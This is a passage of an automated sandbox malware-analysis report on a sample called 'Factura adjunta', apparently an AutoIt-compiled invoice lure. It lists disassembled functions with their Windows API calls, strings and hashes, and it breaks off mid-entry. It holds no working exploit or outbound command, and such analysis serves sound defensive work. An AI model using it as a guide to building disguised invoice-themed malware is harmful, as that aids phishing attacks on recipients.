                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-86951937
                            • Opcode ID: ccb7d0fca73fb833d45a2be144f57abe66313d5e1ea19598772a1d37732177f0
                            • Instruction ID: ff1673461051b7dec11dfde29ec35b80e6bd704b83534dcf57efacc503261dae
                            • Opcode Fuzzy Hash: ccb7d0fca73fb833d45a2be144f57abe66313d5e1ea19598772a1d37732177f0
                            • Instruction Fuzzy Hash: 7381FAB0700245FACB24BB61CC86FEB7778FF55700F148026FA45EA296EB6CDA45C691
                            Function 00838C44 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00838D34
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00838D45
                            • CharNextW.USER32(0000014E), ref: 00838D74
                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00838DB5
                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00838DCB
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00838DDC
                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00838DF9
                            • SetWindowTextW.USER32(?,0000014E), ref: 00838E45
                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00838E5B
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00838E8C
                            • _memset.LIBCMT ref: 00838EB1
                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00838EFA
                            • _memset.LIBCMT ref: 00838F59
                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00838F83
                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00838FDB
                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00839088
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 008390AA
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008390F4
                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00839121
                            • DrawMenuBar.USER32(?), ref: 00839130
                            • SetWindowTextW.USER32(?,0000014E), ref: 00839158
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                            • String ID: 0$h)
                            • API String ID: 1073566785-2843282415
                            • Opcode ID: ce98728b45e954973d0af3c2b5736addab8ea7c58f08777bb8071b6e368258f4
                            • Instruction ID: 25e2c0b2edbd819c6129dc7a49d562af5f314f0d0c72b8adb0b2a1e67d33c482
                            • Opcode Fuzzy Hash: ce98728b45e954973d0af3c2b5736addab8ea7c58f08777bb8071b6e368258f4
                            • Instruction Fuzzy Hash: 8EE19070900209EBDF209F50CC89EEE7BB9FF85714F108156F959EA291DB748A85DFA0
                            Function 0083AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000012), ref: 0083AB99
                            • SetTextColor.GDI32(?,?), ref: 0083AB9D
                            • GetSysColorBrush.USER32(0000000F), ref: 0083ABB3
                            • GetSysColor.USER32(0000000F), ref: 0083ABBE
                            • CreateSolidBrush.GDI32(?), ref: 0083ABC3
                            • GetSysColor.USER32(00000011), ref: 0083ABDB
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0083ABE9
                            • SelectObject.GDI32(?,00000000), ref: 0083ABFA
                            • SetBkColor.GDI32(?,00000000), ref: 0083AC03
                            • SelectObject.GDI32(?,?), ref: 0083AC10
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0083AC2F
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0083AC46
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0083AC5B
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0083ACA7
                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0083ACCE
                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0083ACEC
                            • DrawFocusRect.USER32(?,?), ref: 0083ACF7
                            • GetSysColor.USER32(00000011), ref: 0083AD05
                            • SetTextColor.GDI32(?,00000000), ref: 0083AD0D
                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0083AD21
                            • SelectObject.GDI32(?,0083A869), ref: 0083AD38
                            • DeleteObject.GDI32(?), ref: 0083AD43
                            • SelectObject.GDI32(?,?), ref: 0083AD49
                            • DeleteObject.GDI32(?), ref: 0083AD4E
                            • SetTextColor.GDI32(?,?), ref: 0083AD54
                            • SetBkColor.GDI32(?,?), ref: 0083AD5E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1996641542-0
                            • Opcode ID: 5d4538c98e4505aed606441233ef47ac1b9b89166be643dd3b76c66c8d764590
                            • Instruction ID: 80b0dc7d4a7beaa90435f1a9e3db3c78e151c6bc49a5623dae03947031330489
                            • Opcode Fuzzy Hash: 5d4538c98e4505aed606441233ef47ac1b9b89166be643dd3b76c66c8d764590
                            • Instruction Fuzzy Hash: 11612C71D00218FFDF159FA8DC48EAEBB79FB88320F104525FA15AB2A2D6759940DB90
                            Function 00834B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 00834C51
                            • GetDesktopWindow.USER32 ref: 00834C66
                            • GetWindowRect.USER32(00000000), ref: 00834C6D
                            • GetWindowLongW.USER32(?,000000F0), ref: 00834CCF
                            • DestroyWindow.USER32(?), ref: 00834CFB
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00834D24
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00834D42
                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00834D68
                            • SendMessageW.USER32(?,00000421,?,?), ref: 00834D7D
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00834D90
                            • IsWindowVisible.USER32(?), ref: 00834DB0
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00834DCB
                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00834DDF
                            • GetWindowRect.USER32(?,?), ref: 00834DF7
                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00834E1D
                            • GetMonitorInfoW.USER32(00000000,?), ref: 00834E37
                            • CopyRect.USER32(?,?), ref: 00834E4E
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00834EB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                            • String ID: ($0$tooltips_class32
                            • API String ID: 698492251-4156429822
                            • Opcode ID: 5bff473a2e9d7c22a10e5bffa483e9e948cb44041cef391113636be45f57b90e
                            • Instruction ID: ce7dcdeed6f5366282e62a03673a6d5df30c03d8565567d00b2e25a3d291f966
                            • Opcode Fuzzy Hash: 5bff473a2e9d7c22a10e5bffa483e9e948cb44041cef391113636be45f57b90e
                            • Instruction Fuzzy Hash: ABB15871608341AFDB04DF64C849B6ABBE4FF88714F00891CF6999B2A2D775EC05CB91
                            Function 007B27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007B28BC
                            • GetSystemMetrics.USER32(00000007), ref: 007B28C4
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007B28EF
                            • GetSystemMetrics.USER32(00000008), ref: 007B28F7
                            • GetSystemMetrics.USER32(00000004), ref: 007B291C
                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007B2939
                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007B2949
                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007B297C
                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007B2990
                            • GetClientRect.USER32(00000000,000000FF), ref: 007B29AE
                            • GetStockObject.GDI32(00000011), ref: 007B29CA
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 007B29D5
                              • Part of subcall function 007B2344: GetCursorPos.USER32(?), ref: 007B2357
                              • Part of subcall function 007B2344: ScreenToClient.USER32(008767B0,?), ref: 007B2374
                              • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000001), ref: 007B2399
                              • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                            • SetTimer.USER32(00000000,00000000,00000028,007B1256), ref: 007B29FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                            • String ID: AutoIt v3 GUI
                            • API String ID: 1458621304-248962490
                            • Opcode ID: aa898be45a253bccdcf726d749847d795cc67a5d99429eecc3cafeab6f98f0a9
                            • Instruction ID: 30d8dec8be7e0ea944b04b5454f4cc2ed3fe661479f56206d6b2618de53a16dc
                            • Opcode Fuzzy Hash: aa898be45a253bccdcf726d749847d795cc67a5d99429eecc3cafeab6f98f0a9
                            • Instruction Fuzzy Hash: ACB17F71A01209DFDB14DFA8DC49BED7BB4FB48314F108629FA15E62A1DB38D851CB91
                            Function 008146D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _wcscat$C1560_wcscmp_wcscpy_wcsncpy_wcsstr
                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                            • API String ID: 2258151342-1459072770
                            • Opcode ID: 6a0c12fde86637b3dd302594bfa7c4088b2f4850330d97156d1dc6121236b2fd
                            • Instruction ID: a34b34f6a16c364b9563e0c576dd1b4ddfbfe4057cd318104221a4a62b0187b8
                            • Opcode Fuzzy Hash: 6a0c12fde86637b3dd302594bfa7c4088b2f4850330d97156d1dc6121236b2fd
                            • Instruction Fuzzy Hash: D1410471A00204BBDB10B7649C4AEBF77BCFF41710F14046BF905E6393EB79AA4296A5
                            Function 00834069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 008340F6
                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008341B6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                            • API String ID: 3974292440-719923060
                            • Opcode ID: c50996205443e13c17093980729cd27e3d8da11a71edf9aa4c0a537e14acb31a
                            • Instruction ID: 44a416ccf8fbce1eb3413824e9156bc4f9bb1417f4f7860fd8dd042a014f3551
                            • Opcode Fuzzy Hash: c50996205443e13c17093980729cd27e3d8da11a71edf9aa4c0a537e14acb31a
                            • Instruction Fuzzy Hash: A9A19030214205DBCB14EF24C955BAAB7A5FF84314F109969B9A6EB3D2EB34FC05CB91
                            Function 008252F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                            Download Yara Rule
                            APIs
                            • LoadCursorW.USER32(00000000,00007F89), ref: 00825309
                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00825314
                            • LoadCursorW.USER32(00000000,00007F00), ref: 0082531F
                            • LoadCursorW.USER32(00000000,00007F03), ref: 0082532A
                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00825335
                            • LoadCursorW.USER32(00000000,00007F01), ref: 00825340
                            • LoadCursorW.USER32(00000000,00007F81), ref: 0082534B
                            • LoadCursorW.USER32(00000000,00007F88), ref: 00825356
                            • LoadCursorW.USER32(00000000,00007F80), ref: 00825361
                            • LoadCursorW.USER32(00000000,00007F86), ref: 0082536C
                            • LoadCursorW.USER32(00000000,00007F83), ref: 00825377
                            • LoadCursorW.USER32(00000000,00007F85), ref: 00825382
                            • LoadCursorW.USER32(00000000,00007F82), ref: 0082538D
                            • LoadCursorW.USER32(00000000,00007F84), ref: 00825398
                            • LoadCursorW.USER32(00000000,00007F04), ref: 008253A3
                            • LoadCursorW.USER32(00000000,00007F02), ref: 008253AE
                            • GetCursorInfo.USER32(?), ref: 008253BE
                            • GetLastError.KERNEL32(00000001,00000000), ref: 008253E9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Cursor$Load$ErrorInfoLast
                            • String ID:
                            • API String ID: 3215588206-0
                            • Opcode ID: b154981c6f4b107c8ce1030f58390a4a4b70273ea7963010cb574a8f999f47b2
                            • Instruction ID: ad29dbb6f9b07896974b5c3fdcda73d5ac0d8002495a8405e06f7ed9bff6ce21
                            • Opcode Fuzzy Hash: b154981c6f4b107c8ce1030f58390a4a4b70273ea7963010cb574a8f999f47b2
                            • Instruction Fuzzy Hash: 57418370E44329AADB109FBA9C4996EFFF8FF41B10B10452FE509E7291DAB89440CE95
                            Function 0080AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 0080AAA5
                            • __swprintf.LIBCMT ref: 0080AB46
                            • _wcscmp.LIBCMT ref: 0080AB59
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0080ABAE
                            • _wcscmp.LIBCMT ref: 0080ABEA
                            • GetClassNameW.USER32(?,?,00000400), ref: 0080AC21
                            • GetDlgCtrlID.USER32(?), ref: 0080AC73
                            • GetWindowRect.USER32(?,?), ref: 0080ACA9
                            • GetParent.USER32(?), ref: 0080ACC7
                            • ScreenToClient.USER32(00000000), ref: 0080ACCE
                            • GetClassNameW.USER32(?,?,00000100), ref: 0080AD48
                            • _wcscmp.LIBCMT ref: 0080AD5C
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0080AD82
                            • _wcscmp.LIBCMT ref: 0080AD96
                              • Part of subcall function 007D386C: _iswctype.LIBCMT ref: 007D3874
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                            • String ID: %s%u
                            • API String ID: 3744389584-679674701
                            • Opcode ID: 41585d5d8ec95e651ab013b99d0e1bc162bd4e87a176b89242e4d83c00af61c4
                            • Instruction ID: 759c8094a479602c0ccfca63b89d9aa1f94aaa489d9d85f05c4cfe7fc43fe2a4
                            • Opcode Fuzzy Hash: 41585d5d8ec95e651ab013b99d0e1bc162bd4e87a176b89242e4d83c00af61c4
                            • Instruction Fuzzy Hash: 1CA1BE71204706AFD758DF24CC84FAAB7E8FF44355F008629FAA9D2191DB30E945CB92
                            Function 0080B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0080B3DB
                            • _wcscmp.LIBCMT ref: 0080B3EC
                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0080B414
                            • CharUpperBuffW.USER32(?,00000000), ref: 0080B431
                            • _wcscmp.LIBCMT ref: 0080B44F
                            • _wcsstr.LIBCMT ref: 0080B460
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0080B498
                            • _wcscmp.LIBCMT ref: 0080B4A8
                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0080B4CF
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0080B518
                            • _wcscmp.LIBCMT ref: 0080B528
                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0080B550
                            • GetWindowRect.USER32(00000004,?), ref: 0080B5B9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                            • String ID: @$ThumbnailClass
                            • API String ID: 1788623398-1539354611
                            • Opcode ID: e200071099e65d032c0708842893e80e4699e588344aaf12e27da22006d86267
                            • Instruction ID: 47f75600e6da8cca5dc91a7c8b49b48f1c6575f950772126e3154098f9cfba4a
                            • Opcode Fuzzy Hash: e200071099e65d032c0708842893e80e4699e588344aaf12e27da22006d86267
                            • Instruction Fuzzy Hash: 9181AB710082099BDB44DF10CC85FAA7BE8FF94714F0885AAED95DA1E2DB34DE45CBA1
                            Function 0083A428 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0083A4C8
                            • DestroyWindow.USER32(?,?), ref: 0083A542
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0083A5BC
                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0083A5DE
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0083A5F1
                            • DestroyWindow.USER32(00000000), ref: 0083A613
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007B0000,00000000), ref: 0083A64A
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0083A663
                            • GetDesktopWindow.USER32 ref: 0083A67C
                            • GetWindowRect.USER32(00000000), ref: 0083A683
                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0083A69B
                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0083A6B3
                              • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                            • String ID: 0$h)$tooltips_class32
                            • API String ID: 1297703922-3488958366
                            • Opcode ID: bb6ad5039ac3eb5a6d79829d64d0fbcfa41c970c652760712ec1759980b025c0
                            • Instruction ID: 18961cd38de6cabf4323444b78825571082ba0ae6f9ebd9caf3aabd7950da865
                            • Opcode Fuzzy Hash: bb6ad5039ac3eb5a6d79829d64d0fbcfa41c970c652760712ec1759980b025c0
                            • Instruction Fuzzy Hash: 3E718A70540205AFD728CF28CC4AF667BE5FBA8304F08492DF995C72A1E774E946CB92
                            Function 0080B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
